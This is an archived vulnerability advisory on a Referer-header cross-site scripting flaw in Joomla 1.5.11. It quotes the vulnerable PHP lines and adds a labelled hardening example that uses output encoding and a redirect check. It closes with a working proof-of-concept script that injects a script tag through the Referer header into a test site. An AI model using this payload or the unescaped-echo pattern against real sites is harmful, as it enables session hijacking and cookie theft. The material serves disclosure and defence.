Joomla! HTTP header cross-site scripting vulnerability - vulnerability warning - the black bar safety net

2009-08-15T00:00:00
ID MYHACK58:62200924301
Type myhack58
Reporter Anonymous
Modified 2009-08-15T00:00:00

Description

Joomla! is an open source content management system (CMS).

Joomla! does not properly filter the HTTP_REFERER value submitted in the HTTP request. A remote attacker can send a crafted request to inject JavaScript or DHTML code that executes in the user's browser session. The following is the vulnerable code segment:

components/com_content/views/article/tmpl/form.php, line 225:

221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo $this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo $this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo $this->article->created_by; ?>" />
225 <input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />
226 <?php echo JHTML::_( 'form.token' ); ?>
227 <input type="hidden" name="task" value="" />
228 </form>

Other parts of the code may also be affected:

components/com_user/controller.php, line 86:

$return = @$_SERVER['HTTP_REFERER'];

plugins/system/legacy/html.php, line 246:

echo '<a href="'. $_SERVER['HTTP_REFERER'] .'"><span class="small">'. JText::_( 'BACK' ) .'</span></a>';

templates/beez/html/com_content/article/form.php, line 186:

<input type="hidden" name="referer" value="<?php echo @$_SERVER['HTTP_REFERER']; ?>" />
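As an added illustration, not Joomla's own code and not part of the advisory, the following PHP places the raw attribute echo shown above next to an encoded version, and adds a same-host check for the com_user redirect use, where output encoding alone does not help. The $constructed_server array (standing in for $_SERVER), the host name and the function names are constructed for this example.

```php
<?php
// Added example, not Joomla's own code: the unsafe pattern from the advisory
// next to a hardened version. $constructed_server stands in for $_SERVER.
$constructed_server = array(
    'HTTP_HOST'    => 'localhost',
    // Constructed Referer value in the shape the advisory describes.
    'HTTP_REFERER' => '"><script>alert(document.cookie)</script><span a="',
);

// Unsafe: the raw header lands inside an HTML attribute, so a double quote
// closes the attribute and the remainder is parsed as markup.
function referer_input_vulnerable(array $server)
{
    return '<input type="hidden" name="referer" value="' . @$server['HTTP_REFERER'] . '" />';
}

// Hardened: encode for the attribute context. ENT_QUOTES covers both quote
// characters, so the value can no longer terminate the attribute.
function referer_input_safe(array $server)
{
    $referer = isset($server['HTTP_REFERER']) ? (string) $server['HTTP_REFERER'] : '';
    $encoded = htmlspecialchars($referer, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="referer" value="' . $encoded . '" />';
}

// com_user/controller.php uses the header as a return target. There, output
// encoding is beside the point: accept only an http(s) URL on this host and
// otherwise fall back to a fixed page. (In production compare against a
// configured site host rather than HTTP_HOST, which is also client-supplied.)
function safe_return_url(array $server, $fallback = 'index.php')
{
    $referer = isset($server['HTTP_REFERER']) ? (string) $server['HTTP_REFERER'] : '';
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme']) || !isset($parts['host'])) {
        return $fallback;
    }
    if (!in_array(strtolower($parts['scheme']), array('http', 'https'), true)) {
        return $fallback;
    }
    $expected_host = isset($server['HTTP_HOST']) ? $server['HTTP_HOST'] : '';
    if (strcasecmp($parts['host'], $expected_host) !== 0) {
        return $fallback;
    }
    return $referer;
}

echo "unsafe:   ", referer_input_vulnerable($constructed_server), PHP_EOL;
echo "safe:     ", referer_input_safe($constructed_server), PHP_EOL;
echo "redirect: ", safe_return_url($constructed_server), PHP_EOL;
```

Run with `php example.php`. The "safe" line shows the quote and angle brackets turned into `&quot;`, `&lt;` and `&gt;`, so the browser keeps the whole header inside the attribute value; the "redirect" line falls back to index.php because the constructed header is not a URL on the expected host.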

<*source: Juan Galiana Lara (jgaliana@isecauditors.com)

Link: http://marc.info/?l=bugtraq&m=124655389716111&w=2 *>

Test method:

--------------------------------------------------------------------------------

Warning

The following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!

<?php

/* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */

/* config */
$site='localhost';
$path='/joomla-1.5.11';
$cookname='d85558a8cf943386aaa374896bfd3d99';
$cookvalue='4ab56fdd83bcad86289726aead602699';

class cURL {
    var $headers;
    var $user_agent;
    var $compression;
    var $cookie_file;
    var $proxy;
    var $cookies;
    /* evil script */
    var $xss='alert("PWN PWN PWN:" + document.cookie);';

    function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') {
        $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
        $this->headers[] = 'Connection: Keep-Alive';
        $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
        /* the payload is sent in the Referer header, which the page echoes unencoded */
        $this->headers[] = 'Referer: "><script>' . $this->xss .'</script><span a="';
        $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
        $this->compression=$compression;
        $this->proxy=$proxy;
        $this->cookies=$cookies;
        if ($this->cookies == TRUE) $this->cookie($cookie);
    }

    function cookie($cookie_file) {
        if (file_exists($cookie_file)) {
            $this->cookie_file=$cookie_file;
        } else {
            $fp = fopen($cookie_file,'w') or $this->error('The cookie file could not be opened. Check permissions');
            $this->cookie_file=$cookie_file;
            fclose($fp);
        }
    }

    function get($url) {
        $process = curl_init($url);
        curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
        curl_setopt($process, CURLOPT_HEADER, 0);
        curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
        if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEFILE, $this->cookie_file);
        if ($this->cookies == TRUE) curl_setopt($process, CURLOPT_COOKIEJAR, $this->cookie_file);
        curl_setopt($process, CURLOPT_ENCODING, $this->compression);
        curl_setopt($process, CURLOPT_TIMEOUT, 30);
        if ($this->proxy) curl_setopt($process, CURLOPT_PROXY, 'proxy_ip:proxy_port');
        curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
        $return = curl_exec($process);
        curl_close($process);
        return $return;
    }

    function error($error) {
        echo $error;
        die;
    }
}

/* set cookie */
$f=fopen("cookies.txt","w");
fwrite($f,"localhost\tFALSE\t/\tFALSE\t0\t$cookname\t$cookvalue\n");
fclose($f);

/* do request */
$cc = new cURL();
$c=$cc->get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form');

/* let's execute some javascript.. }:-) */
echo $c;
?>

This article comes from the CSDN blog; when reproducing it, please indicate the source: <http://blog.csdn.net/cnbird2008/archive/2009/07/08/4329842.aspx>